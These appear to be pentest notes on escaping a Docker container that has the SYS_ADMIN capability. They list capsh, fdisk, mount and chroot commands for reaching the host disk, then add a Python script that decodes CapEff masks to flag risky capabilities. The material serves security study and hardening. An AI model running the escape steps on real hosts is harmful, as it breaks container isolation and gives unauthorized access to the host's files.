Docker - Escalation of privileges - Capabilities
- Escalation
Inside a container, list the capabilities:
capsh --print
Check the possible rights:
Example: SYS_ADMIN
List of capabilities: https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
With the SYS_ADMIN capability ("Perform a range of system administration operations"), it is possible, among other things, to mount disks.
List the disks:
fdisk -l
Mount the disk:
mount /dev/sda /mnt/
Container escape:
chroot /mnt bash
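The capability check at the start of these notes can be automated from the defender's side: the example below is added here (it is not part of the original notes) and decodes the CapEff mask of a process from /proc/<pid>/status, then flags capabilities outside Docker's default set, such as SYS_ADMIN, that give container root a route to the host. The CapEff values in the samples are constructed (Docker's default mask, and the same mask with bit 21 added).

```python
# Added example, not from the original notes: decode a process's effective
# capability mask (CapEff in /proc/<pid>/status) into names and flag the ones
# that let container root reach the host, e.g. CAP_SYS_ADMIN (mount).
import re

# Capability bit numbers as defined in linux/capability.h (index = bit).
CAP_NAMES = [
    "CHOWN", "DAC_OVERRIDE", "DAC_READ_SEARCH", "FOWNER", "FSETID", "KILL",
    "SETGID", "SETUID", "SETPCAP", "LINUX_IMMUTABLE", "NET_BIND_SERVICE",
    "NET_BROADCAST", "NET_ADMIN", "NET_RAW", "IPC_LOCK", "IPC_OWNER",
    "SYS_MODULE", "SYS_RAWIO", "SYS_CHROOT", "SYS_PTRACE", "SYS_PACCT",
    "SYS_ADMIN", "SYS_BOOT", "SYS_NICE", "SYS_RESOURCE", "SYS_TIME",
    "SYS_TTY_CONFIG", "MKNOD", "LEASE", "AUDIT_WRITE", "AUDIT_CONTROL",
    "SETFCAP", "MAC_OVERRIDE", "MAC_ADMIN", "SYSLOG", "WAKE_ALARM",
    "BLOCK_SUSPEND", "AUDIT_READ", "PERFMON", "BPF", "CHECKPOINT_RESTORE",
]

# Not in Docker's default set; each one is a known route from container
# root to host resources (mount, kernel modules, raw block devices, ptrace).
RISKY = {"SYS_ADMIN", "SYS_MODULE", "SYS_RAWIO", "SYS_PTRACE", "DAC_READ_SEARCH"}

def decode_caps(mask: int) -> set[str]:
    """Return the capability names whose bit is set in mask."""
    return {name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1}

def cap_eff(status_text: str) -> int:
    """Extract the CapEff hex mask from /proc/<pid>/status content."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.MULTILINE)
    if not m:
        raise ValueError("no CapEff line found")
    return int(m.group(1), 16)

def audit(status_text: str) -> dict:
    """Decode CapEff and report which risky capabilities are present."""
    caps = decode_caps(cap_eff(status_text))
    return {"caps": caps, "risky": caps & RISKY}

# Constructed samples: Docker's default mask for root in a container, and the
# same container started with --cap-add SYS_ADMIN (bit 21 added).
DEFAULT_STATUS = "Name:\tbash\nCapEff:\t00000000a80425fb\n"
SYS_ADMIN_STATUS = "Name:\tbash\nCapEff:\t00000000a82425fb\n"

if __name__ == "__main__":
    with open("/proc/self/status") as f:  # audit the current process
        print(audit(f.read()))
```

Run inside a container to see whether anything beyond the default 14 capabilities was granted; an empty "risky" set is the expected result for a container started without --cap-add or --privileged.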